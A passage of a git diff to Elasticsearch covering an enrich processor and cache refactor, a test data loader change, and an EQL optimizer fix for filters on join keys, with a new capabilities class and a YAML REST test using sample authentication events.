a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/AbstractEnrichProcessor.java b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/AbstractEnrichProcessor.java index c2bcc67184958..4903643795f18 100644 --- a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/AbstractEnrichProcessor.java +++ b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/AbstractEnrichProcessor.java @@ -14,13 +14,12 @@ import org.elasticsearch.ingest.IngestDocument; import org.elasticsearch.script.TemplateScript; import org.elasticsearch.search.builder.SearchSourceBuilder; -import org.elasticsearch.xpack.core.enrich.EnrichPolicy; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.function.BiConsumer; -import java.util.function.Supplier; +import java.util.function.Function; public abstract class AbstractEnrichProcessor extends AbstractProcessor { @@ -32,7 +31,6 @@ public abstract class AbstractEnrichProcessor extends AbstractProcessor { private final boolean overrideEnabled; protected final String matchField; protected final int maxMatches; - private final String indexAlias; protected AbstractEnrichProcessor( String tag, @@ -55,8 +53,6 @@ protected AbstractEnrichProcessor( this.overrideEnabled = overrideEnabled; this.matchField = matchField; this.maxMatches = maxMatches; - // note: since the policyName determines the indexAlias, we can calculate this once - this.indexAlias = EnrichPolicy.getBaseName(policyName); } public abstract QueryBuilder getQueryBuilder(Object fieldValue); @@ -72,7 +68,7 @@ public void execute(IngestDocument ingestDocument, BiConsumer searchRequestSupplier = () -> { + final Function searchRequestBuilder = (concreteEnrichIndex) -> { QueryBuilder queryBuilder = getQueryBuilder(value); ConstantScoreQueryBuilder constantScore = new ConstantScoreQueryBuilder(queryBuilder); SearchSourceBuilder searchBuilder = new SearchSourceBuilder(); @@ -82,13 +78,13 @@ public void execute(IngestDocument ingestDocument, BiConsumer { + searchRunner.accept(value, maxMatches, searchRequestBuilder, (searchHits, e) -> { if (e != null) { handler.accept(null, e); return; diff --git a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichCache.java b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichCache.java index 6a621d1539d55..c0dc1b70835ba 100644 --- a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichCache.java +++ b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichCache.java @@ -23,7 +23,7 @@ import java.util.Collections; import java.util.List; import java.util.Map; -import java.util.concurrent.atomic.AtomicLong; +import java.util.concurrent.atomic.LongAdder; import java.util.function.Consumer; import java.util.function.LongSupplier; import java.util.function.ToLongBiFunction; @@ -47,9 +47,9 @@ public final class EnrichCache { private final Cache cache; private final LongSupplier relativeNanoTimeProvider; - private final AtomicLong hitsTimeInNanos = new AtomicLong(0); - private final AtomicLong missesTimeInNanos = new AtomicLong(0); - private final AtomicLong sizeInBytes = new AtomicLong(0); + private final LongAdder hitsTimeInNanos = new LongAdder(); + private final LongAdder missesTimeInNanos = new LongAdder(); + private final LongAdder sizeInBytes = new LongAdder(); EnrichCache(long maxSize) { this(maxSize, System::nanoTime); @@ -72,7 +72,7 @@ public final class EnrichCache { private Cache createCache(long maxWeight, ToLongBiFunction weigher) { var builder = CacheBuilder.builder().setMaximumWeight(maxWeight).removalListener(notification -> { - sizeInBytes.getAndAdd(-1 * notification.getValue().sizeInBytes); + sizeInBytes.add(-1 * notification.getValue().sizeInBytes); }); if (weigher != null) { builder.weigher(weigher); @@ -105,7 +105,7 @@ public void computeIfAbsent( List> response = get(cacheKey); long cacheRequestTime = relativeNanoTimeProvider.getAsLong() - cacheStart; if (response != null) { - hitsTimeInNanos.addAndGet(cacheRequestTime); + hitsTimeInNanos.add(cacheRequestTime); listener.onResponse(response); } else { final long retrieveStart = relativeNanoTimeProvider.getAsLong(); @@ -114,7 +114,7 @@ public void computeIfAbsent( put(cacheKey, cacheValue); List> copy = deepCopy(cacheValue.hits, false); long databaseQueryAndCachePutTime = relativeNanoTimeProvider.getAsLong() - retrieveStart; - missesTimeInNanos.addAndGet(cacheRequestTime + databaseQueryAndCachePutTime); + missesTimeInNanos.add(cacheRequestTime + databaseQueryAndCachePutTime); listener.onResponse(copy); }, listener::onFailure)); } @@ -133,7 +133,7 @@ public void computeIfAbsent( // non-private for unit testing only void put(CacheKey cacheKey, CacheValue cacheValue) { cache.put(cacheKey, cacheValue); - sizeInBytes.addAndGet(cacheValue.sizeInBytes); + sizeInBytes.add(cacheValue.sizeInBytes); } public EnrichStatsAction.Response.CacheStats getStats(String localNodeId) { @@ -144,9 +144,9 @@ public EnrichStatsAction.Response.CacheStats getStats(String localNodeId) { cacheStats.getHits(), cacheStats.getMisses(), cacheStats.getEvictions(), - TimeValue.nsecToMSec(hitsTimeInNanos.get()), - TimeValue.nsecToMSec(missesTimeInNanos.get()), - sizeInBytes.get() + TimeValue.nsecToMSec(hitsTimeInNanos.sum()), + TimeValue.nsecToMSec(missesTimeInNanos.sum()), + sizeInBytes.sum() ); } diff --git a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichProcessorFactory.java b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichProcessorFactory.java index ee685a7b86d2b..55f7fdcfbb790 100644 --- a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichProcessorFactory.java +++ b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichProcessorFactory.java @@ -15,7 +15,6 @@ import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.cluster.metadata.ProjectId; -import org.elasticsearch.cluster.metadata.ProjectMetadata; import org.elasticsearch.common.geo.Orientation; import org.elasticsearch.common.geo.ShapeRelation; import org.elasticsearch.common.xcontent.support.XContentMapValues; @@ -32,7 +31,7 @@ import java.util.Objects; import java.util.function.BiConsumer; import java.util.function.Consumer; -import java.util.function.Supplier; +import java.util.function.Function; import static org.elasticsearch.xpack.core.ClientHelper.ENRICH_ORIGIN; @@ -64,14 +63,18 @@ public Processor create( if (metadata == null) { throw new IllegalStateException("enrich processor factory has not yet been initialized with cluster state"); } - final var project = metadata.getProject(projectId); - IndexAbstraction indexAbstraction = project.getIndicesLookup().get(indexAlias); - if (indexAbstraction == null) { - throw new IllegalArgumentException("no enrich index exists for policy with name [" + policyName + "]"); + + final IndexMetadata imd; + { + final var project = metadata.getProject(projectId); + IndexAbstraction indexAbstraction = project.getIndicesLookup().get(indexAlias); + if (indexAbstraction == null) { + throw new IllegalArgumentException("no enrich index exists for policy with name [" + policyName + "]"); + } + assert indexAbstraction.getType() == IndexAbstraction.Type.ALIAS; + assert indexAbstraction.getIndices().size() == 1; + imd = project.index(indexAbstraction.getIndices().get(0)); } - assert indexAbstraction.getType() == IndexAbstraction.Type.ALIAS; - assert indexAbstraction.getIndices().size() == 1; - IndexMetadata imd = project.index(indexAbstraction.getIndices().get(0)); Map mappingAsMap = imd.mapping().sourceAsMap(); String policyType = (String) XContentMapValues.extractValue( @@ -88,7 +91,7 @@ public Processor create( if (maxMatches < 1 || maxMatches > 128) { throw ConfigurationUtils.newConfigurationException(TYPE, tag, "max_matches", "should be between 1 and 128"); } - var searchRunner = createSearchRunner(project, indexAlias); + var searchRunner = createSearchRunner(projectId, indexAlias); switch (policyType) { case EnrichPolicy.MATCH_TYPE: case EnrichPolicy.RANGE_TYPE: @@ -133,18 +136,19 @@ public void accept(ClusterState state) { metadata = state.getMetadata(); } - private SearchRunner createSearchRunner(ProjectMetadata project, String indexAlias) { - Client originClient = new OriginSettingClient(client, ENRICH_ORIGIN); + private SearchRunner createSearchRunner(final ProjectId projectId, final String indexAlias) { + final Client originClient = new OriginSettingClient(client, ENRICH_ORIGIN); return (value, maxMatches, reqSupplier, handler) -> { + final String concreteEnrichIndex = getEnrichIndexKey(projectId, indexAlias); // intentionally non-locking for simplicity...it's OK if we re-put the same key/value in the cache during a race condition. enrichCache.computeIfAbsent( - project.id(), - getEnrichIndexKey(project, indexAlias), + projectId, + concreteEnrichIndex, value, maxMatches, (searchResponseActionListener) -> originClient.execute( EnrichCoordinatorProxyAction.INSTANCE, - reqSupplier.get(), + reqSupplier.apply(concreteEnrichIndex), searchResponseActionListener ), ActionListener.wrap(resp -> handler.accept(resp, null), e -> handler.accept(null, e)) @@ -152,8 +156,8 @@ private SearchRunner createSearchRunner(ProjectMetadata project, String indexAli }; } - private String getEnrichIndexKey(ProjectMetadata project, String indexAlias) { - IndexAbstraction ia = project.getIndicesLookup().get(indexAlias); + private String getEnrichIndexKey(final ProjectId projectId, final String indexAlias) { + IndexAbstraction ia = metadata.getProject(projectId).getIndicesLookup().get(indexAlias); if (ia == null) { throw new IndexNotFoundException("no generated enrich index [" + indexAlias + "]"); } @@ -164,7 +168,7 @@ public interface SearchRunner { void accept( Object value, int maxMatches, - Supplier searchRequestSupplier, + Function searchRequestBuilder, BiConsumer>, Exception> handler ); } diff --git a/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/GeoMatchProcessorTests.java b/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/GeoMatchProcessorTests.java index f122e34db5488..e0179f6b0c4a0 100644 --- a/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/GeoMatchProcessorTests.java +++ b/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/GeoMatchProcessorTests.java @@ -28,7 +28,7 @@ import java.util.List; import java.util.Map; import java.util.function.BiConsumer; -import java.util.function.Supplier; +import java.util.function.Function; import static org.elasticsearch.xpack.enrich.MatchProcessorTests.str; import static org.hamcrest.Matchers.emptyArray; @@ -162,10 +162,10 @@ private static final class MockSearchFunction implements EnrichProcessorFactory. public void accept( Object value, int maxMatches, - Supplier searchRequestSupplier, + Function searchRequestBuilder, BiConsumer>, Exception> handler ) { - capturedRequest.set(searchRequestSupplier.get()); + capturedRequest.set(searchRequestBuilder.apply(".enrich-_name")); if (exception != null) { handler.accept(null, exception); } else { diff --git a/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/MatchProcessorTests.java b/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/MatchProcessorTests.java index 4e3496e1a5838..3bf0fae2db0e5 100644 --- a/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/MatchProcessorTests.java +++ b/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/MatchProcessorTests.java @@ -25,7 +25,7 @@ import java.util.List; import java.util.Map; import java.util.function.BiConsumer; -import java.util.function.Supplier; +import java.util.function.Function; import static org.hamcrest.Matchers.emptyArray; import static org.hamcrest.Matchers.equalTo; @@ -405,10 +405,10 @@ private static final class MockSearchFunction implements EnrichProcessorFactory. public void accept( Object value, int maxMatches, - Supplier searchRequestSupplier, + Function searchRequestBuilder, BiConsumer>, Exception> handler ) { - capturedRequest.set(searchRequestSupplier.get()); + capturedRequest.set(searchRequestBuilder.apply(".enrich-_name")); if (exception != null) { handler.accept(null, exception); } else { diff --git a/x-pack/plugin/enrich/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java b/x-pack/plugin/enrich/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java similarity index 59% rename from x-pack/plugin/enrich/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java rename to x-pack/plugin/enrich/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java index 98b4ad024639e..761977ba65d98 100644 --- a/x-pack/plugin/enrich/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java +++ b/x-pack/plugin/enrich/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java @@ -9,11 +9,26 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.local.distribution.DistributionType; import org.elasticsearch.test.rest.yaml.ClientYamlTestCandidate; import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; +import org.junit.ClassRule; public class EnrichRestIT extends ESClientYamlSuiteTestCase { + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .distribution(DistributionType.DEFAULT) + .setting("xpack.security.enabled", "false") + .setting("xpack.license.self_generated.type", "basic") + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + public EnrichRestIT(final ClientYamlTestCandidate testCandidate) { super(testCandidate); } @@ -22,5 +37,4 @@ public EnrichRestIT(final ClientYamlTestCandidate testCandidate) { public static Iterable parameters() throws Exception { return createParameters(); } - } diff --git a/x-pack/plugin/ent-search/src/test/java/org/elasticsearch/xpack/application/search/SearchApplicationTests.java b/x-pack/plugin/ent-search/src/test/java/org/elasticsearch/xpack/application/search/SearchApplicationTests.java index b4c088487e017..eaa52dfdee7c0 100644 --- a/x-pack/plugin/ent-search/src/test/java/org/elasticsearch/xpack/application/search/SearchApplicationTests.java +++ b/x-pack/plugin/ent-search/src/test/java/org/elasticsearch/xpack/application/search/SearchApplicationTests.java @@ -7,7 +7,7 @@ package org.elasticsearch.xpack.application.search; -import org.elasticsearch.TransportVersions; +import org.elasticsearch.TransportVersion; import org.elasticsearch.common.bytes.BytesArray; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.io.stream.BytesStreamOutput; @@ -140,7 +140,7 @@ private SearchApplication assertIndexSerialization(SearchApplication testInstanc SearchApplicationIndexService.writeSearchApplicationBinaryWithVersion( testInstance, output, - TransportVersions.MINIMUM_COMPATIBLE + TransportVersion.minimumCompatible() ); try ( StreamInput in = new NamedWriteableAwareStreamInput( diff --git a/x-pack/plugin/eql/qa/common/build.gradle b/x-pack/plugin/eql/qa/common/build.gradle index 5fe6e54a440a8..04cfb01f9376f 100644 --- a/x-pack/plugin/eql/qa/common/build.gradle +++ b/x-pack/plugin/eql/qa/common/build.gradle @@ -8,3 +8,10 @@ dependencies { // TOML parser for EqlActionIT tests api 'io.ous:jtoml:2.0.0' } + +tasks.register("loadTestData", JavaExec) { + group = "Execution" + description = "Loads EQL Spec Tests data on a running stand-alone instance" + classpath = sourceSets.main.runtimeClasspath + mainClass = "org.elasticsearch.test.eql.DataLoader" +} diff --git a/x-pack/plugin/eql/qa/common/src/main/java/org/elasticsearch/test/eql/DataLoader.java b/x-pack/plugin/eql/qa/common/src/main/java/org/elasticsearch/test/eql/DataLoader.java index 4618bd8f4ff3d..2794f514777a5 100644 --- a/x-pack/plugin/eql/qa/common/src/main/java/org/elasticsearch/test/eql/DataLoader.java +++ b/x-pack/plugin/eql/qa/common/src/main/java/org/elasticsearch/test/eql/DataLoader.java @@ -76,39 +76,60 @@ private static Map getReplacementPatterns() { public static void main(String[] args) throws IOException { main = true; try (RestClient client = RestClient.builder(new HttpHost("localhost", 9200)).build()) { - loadDatasetIntoEs(client, DataLoader::createParser); + loadDatasetIntoEsWithIndexCreator(client, DataLoader::createParser, (restClient, indexName, indexMapping) -> { + // don't use ESRestTestCase methods here or, if you do, test running the main method before making the change + StringBuilder jsonBody = new StringBuilder("{"); + jsonBody.append("\"settings\":{\"number_of_shards\":1},"); + jsonBody.append("\"mappings\":"); + jsonBody.append(indexMapping); + jsonBody.append("}"); + + Request request = new Request("PUT", "/" + indexName); + request.setJsonEntity(jsonBody.toString()); + restClient.performRequest(request); + }); } } public static void loadDatasetIntoEs(RestClient client, CheckedBiFunction p) throws IOException { + loadDatasetIntoEsWithIndexCreator(client, p, (restClient, indexName, indexMapping) -> { + ESRestTestCase.createIndex(restClient, indexName, Settings.builder().put("number_of_shards", 1).build(), indexMapping, null); + }); + } + + private static void loadDatasetIntoEsWithIndexCreator( + RestClient client, + CheckedBiFunction p, + IndexCreator indexCreator + ) throws IOException { // // Main Index // - load(client, TEST_INDEX, null, DataLoader::timestampToUnixMillis, p); + load(client, TEST_INDEX, null, DataLoader::timestampToUnixMillis, p, indexCreator); // // Aux Index // - load(client, TEST_EXTRA_INDEX, null, null, p); + load(client, TEST_EXTRA_INDEX, null, null, p, indexCreator); // // Date_Nanos index // // The data for this index is loaded from the same endgame-140.data sample, only having the mapping for @timestamp changed: the // chosen Windows filetime timestamps (2017+) can coincidentally also be readily used as nano-resolution unix timestamps (1973+). // There are mixed values with and without nanos precision so that the filtering is properly tested for both cases. - load(client, TEST_NANOS_INDEX, TEST_INDEX, DataLoader::timestampToUnixNanos, p); - load(client, TEST_SAMPLE, null, null, p); + load(client, TEST_NANOS_INDEX, TEST_INDEX, DataLoader::timestampToUnixNanos, p, indexCreator); + load(client, TEST_SAMPLE, null, null, p, indexCreator); // // missing_events index // - load(client, TEST_MISSING_EVENTS_INDEX, null, null, p); - load(client, TEST_SAMPLE_MULTI, null, null, p); + load(client, TEST_MISSING_EVENTS_INDEX, null, null, p, indexCreator); + load(client, TEST_SAMPLE_MULTI, null, null, p, indexCreator); // // index with a runtime field ("broken", type long) that causes shard failures. // the rest of the mapping is the same as TEST_INDEX // - load(client, TEST_SHARD_FAILURES_INDEX, null, DataLoader::timestampToUnixMillis, p); + load(client, TEST_SHARD_FAILURES_INDEX, null, DataLoader::timestampToUnixMillis, p, indexCreator); } private static void load( @@ -116,7 +137,8 @@ private static void load( String indexNames, String dataName, Consumer> datasetTransform, - CheckedBiFunction p + CheckedBiFunction p, + IndexCreator indexCreator ) throws IOException { String[] splitNames = indexNames.split(","); for (String indexName : splitNames) { @@ -130,15 +152,11 @@ private static void load( if (data == null) { throw new IllegalArgumentException("Cannot find resource " + name); } - createTestIndex(client, indexName, readMapping(mapping)); + indexCreator.createIndex(client, indexName, readMapping(mapping)); loadData(client, indexName, datasetTransform, data, p); } } - private static void createTestIndex(RestClient client, String indexName, String mapping) throws IOException { - ESRestTestCase.createIndex(client, indexName, Settings.builder().put("number_of_shards", 1).build(), mapping, null); - } - /** * Reads the mapping file, ignoring comments and replacing placeholders for random types. */ @@ -236,4 +254,8 @@ private static XContentParser createParser(XContent xContent, InputStream data) NamedXContentRegistry contentRegistry = new NamedXContentRegistry(ClusterModule.getNamedXWriteables()); return xContent.createParser(contentRegistry, LoggingDeprecationHandler.INSTANCE, data); } + + private interface IndexCreator { + void createIndex(RestClient client, String indexName, String mapping) throws IOException; + } } diff --git a/x-pack/plugin/eql/qa/rest/build.gradle b/x-pack/plugin/eql/qa/rest/build.gradle index 568a379455563..15990b73de03e 100644 --- a/x-pack/plugin/eql/qa/rest/build.gradle +++ b/x-pack/plugin/eql/qa/rest/build.gradle @@ -12,7 +12,7 @@ apply plugin: 'elasticsearch.internal-test-artifact' restResources { restApi { - include '_common', 'bulk', 'indices', 'eql' + include '_common', 'bulk', 'indices', 'eql', 'capabilities' } } diff --git a/x-pack/plugin/eql/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/eql/70_functions_on_keys.yml b/x-pack/plugin/eql/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/eql/70_functions_on_keys.yml new file mode 100644 index 0000000000000..784de265983c2 --- /dev/null +++ b/x-pack/plugin/eql/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/eql/70_functions_on_keys.yml @@ -0,0 +1,119 @@ +--- +setup: + - requires: + test_runner_features: [ capabilities ] + capabilities: + - method: POST + path: /{index}/_eql/search + parameters: [ ] + capabilities: [ filters_on_keys_fix ] + reason: "Testing a recent fix" + - do: + indices.create: + index: eql_test + body: + { + "mappings": { + "properties": { + "@timestamp": { + "type": "date" + }, + "event": { + "properties": { + "type": { + "type": "keyword", + "ignore_above": 1024 + } + } + }, + "user": { + "properties": { + "domain": { + "type": "keyword", + "ignore_above": 1024 + }, + "name": { + "type": "keyword", + "fields": { + "text": { + "type": "match_only_text" + } + } + } + } + }, + "winlog": { + "dynamic": "true", + "properties": { + "computer_name": { + "type": "keyword", + "ignore_above": 1024 + } + } + }, + "source": { + "properties": { + "ip": { + "type": "ip" + } + } + } + } + } + } + - do: + bulk: + refresh: true + body: + - index: + _index: eql_test + _id: "1" + - "winlog": + "computer_name": "foo.bar.baz" + "@timestamp": "2025-06-18T12:21:37.018Z" + "event": + "category": "authentication" + "code": "5145" + "user": + "domain": "bar.baz" + "name": "something" + "source": + "ip": "192.168.56.200" + - index: + _index: eql_test + _id: "2" + - "winlog": + "computer_name": "foo.bar.baz" + "@timestamp": "2025-06-18T12:21:37.093Z" + "event": + "category": "authentication" + "user": + "domain": "BAR.BAZ" + "name": "foo$" + "source": + "ip": "192.168.56.200" + +--- +"Test one join key": + - do: + eql.search: + index: eql_test + body: + query: 'sequence by source.ip with maxspan=5s [any where event.code : "5145" and winlog.computer_name == "foo.bar.baz" ] [any where winlog.computer_name == "foo.bar.baz" and startswith(winlog.computer_name, substring(user.name, 0, -1)) ]' + + - match: {timed_out: false} + - match: {hits.total.value: 1} + - match: {hits.total.relation: "eq"} + +--- +"Test two join keys ": + - do: + eql.search: + index: eql_test + body: + query: 'sequence by source.ip, winlog.computer_name with maxspan=5s [any where event.code : "5145" and winlog.computer_name == "foo.bar.baz" ] [any where winlog.computer_name == "foo.bar.baz" and startswith(winlog.computer_name, substring(user.name, 0, -1)) ]' + + - match: {timed_out: false} + - match: {hits.total.value: 1} + - match: {hits.total.relation: "eq"} + diff --git a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/optimizer/Optimizer.java b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/optimizer/Optimizer.java index 5bccf013bc789..8f0757814e74a 100644 --- a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/optimizer/Optimizer.java +++ b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/optimizer/Optimizer.java @@ -23,6 +23,7 @@ import org.elasticsearch.xpack.eql.session.Payload.Type; import org.elasticsearch.xpack.eql.util.MathUtils; import org.elasticsearch.xpack.eql.util.StringUtils; +import org.elasticsearch.xpack.ql.expression.Attribute; import org.elasticsearch.xpack.ql.expression.Expression; import org.elasticsearch.xpack.ql.expression.FieldAttribute; import org.elasticsearch.xpack.ql.expression.Literal; @@ -44,7 +45,6 @@ import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.BinaryComparisonSimplification; import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.BooleanFunctionEqualsElimination; import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.BooleanSimplification; -import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.CombineDisjunctionsToIn; import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.ConstantFolding; import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.LiteralsOnTheRight; import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.OptimizerRule; @@ -252,6 +252,14 @@ protected Expression maybeSimplifyNegatable(Expression e) { } + static class CombineDisjunctionsToIn extends org.elasticsearch.xpack.ql.optimizer.OptimizerRules.CombineDisjunctionsToIn { + + @Override + protected boolean shouldValidateIn() { + return true; + } + } + static class PruneFilters extends org.elasticsearch.xpack.ql.optimizer.OptimizerRules.PruneFilters { @Override @@ -409,23 +417,29 @@ private static List detectKeyConstraints(Expression condition, Keyed List and = Predicates.splitAnd(condition); for (Expression exp : and) { - // if there are no conjunction and at least one key matches, save the expression along with the key - // and its ordinal so it can be replaced - if (exp.anyMatch(Or.class::isInstance) == false) { - // comparisons against variables are not done - // hence why on the first key match, the expression is picked up - exp.anyMatch(e -> { - for (int i = 0; i < keys.size(); i++) { - Expression key = keys.get(i); - if (e.semanticEquals(key)) { - constraints.add(new Constraint(exp, filter, i)); - return true; - } - } - return false; - }); + // if the expression only involves filter keys, it's simple enough (eg. there are no conjunction), and at least one key + // matches, save the expression along with the key and its ordinal so it can be replaced + if (exp.anyMatch(Or.class::isInstance)) { + continue; } + + // expressions that involve attributes other than the keys have to be discarded + if (exp.anyMatch(x -> x instanceof Attribute && keys.stream().noneMatch(k -> x.semanticEquals(k)))) { + continue; + } + + exp.anyMatch(e -> { + for (int i = 0; i < keys.size(); i++) { + Expression key = keys.get(i); + if (e.semanticEquals(key)) { + constraints.add(new Constraint(exp, filter, i)); + return true; + } + } + return false; + }); } + return constraints; } diff --git a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/parser/LogicalPlanBuilder.java b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/parser/LogicalPlanBuilder.java index 194c2c7fde459..620731f4b6911 100644 --- a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/parser/LogicalPlanBuilder.java +++ b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/parser/LogicalPlanBuilder.java @@ -330,6 +330,9 @@ public Sequence visitSequence(SequenceContext ctx) { // until is already parsed through sequenceTerm() above if (ctx.until != null) { + if (queries.size() == 2) { + throw new ParsingException(source, "A sequence requires a minimum of 2 queries (excluding UNTIL clause), found [1]"); + } until = queries.remove(queries.size() - 1); } else { until = defaultUntil(source); diff --git a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/EqlCapabilities.java b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/EqlCapabilities.java new file mode 100644 index 0000000000000..a3af8a932fa66 --- /dev/null +++ b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/EqlCapabilities.java @@ -0,0 +1,26 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.eql.plugin; + +import java.util.HashSet; +import java.util.Set; + +public final class EqlCapabilities { + + private EqlCapabilities() {} + + /** Fix bug on filters that include join keys https://github.com/elastic/elasticsearch/issues/133065 */ + private static final String FILTERS_ON_KEYS_FIX = "filters_on_keys_fix"; + + public static final Set CAPABILITIES; + static { + HashSet capabilities = new HashSet<>(); + capabilities.add(FILTERS_ON_KEYS_FIX); + CAPABILITIES = Set.copyOf(capabilities); + } +} diff --git a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/RestEqlSearchAction.java b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/RestEqlSearchAction.java index 65def24563e5e..651868eb04183 100644 --- a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/RestEqlSearchAction.java +++ b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/RestEqlSearchAction.java @@ -29,6 +29,7 @@ import java.io.IOException; import java.util.List; +import java.util.Set; import static org.elasticsearch.rest.RestRequest.Method.GET; import static org.elasticsearch.rest.RestRequest.Method.POST; @@ -116,4 +117,9 @@ public void onFailure(Exception e) { public String getName() { return "eql_search"; } + + @Override + public Set supportedCapabilities() { + return EqlCapabilities.CAPABILITIES; + } } diff --git a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCSerializationTestCase.java b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCSerializationTestCase.java index 2e8b8578b5056..5c401524fd82c 100644 --- a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCSerializationTestCase.java +++ b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCSerializationTestCase.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.eql; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.test.AbstractXContentSerializingTestCase; import org.elasticsearch.test.TransportVersionUtils; @@ -21,7 +20,7 @@ public abstract class AbstractBWCSerializationTestCase extends AbstractXContentSerializingTestCase { private static NavigableSet getAllBWCVersions() { - return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersions.MINIMUM_COMPATIBLE, true); + return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersion.minimumCompatible(), true); } private static final NavigableSet DEFAULT_BWC_VERSIONS = getAllBWCVersions(); diff --git a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCWireSerializingTestCase.java b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCWireSerializingTestCase.java index 76c2b3355e236..e174bcff5d855 100644 --- a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCWireSerializingTestCase.java +++ b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCWireSerializingTestCase.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.eql; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.test.AbstractWireSerializingTestCase; import org.elasticsearch.test.TransportVersionUtils; @@ -20,7 +19,7 @@ public abstract class AbstractBWCWireSerializingTestCase extends AbstractWireSerializingTestCase { private static NavigableSet getAllBWCVersions() { - return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersions.MINIMUM_COMPATIBLE, true); + return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersion.minimumCompatible(), true); } private static final NavigableSet DEFAULT_BWC_VERSIONS = getAllBWCVersions(); diff --git a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/optimizer/OptimizerTests.java b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/optimizer/OptimizerTests.java index 199117c3df43a..934f913e469d4 100644 --- a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/optimizer/OptimizerTests.java +++ 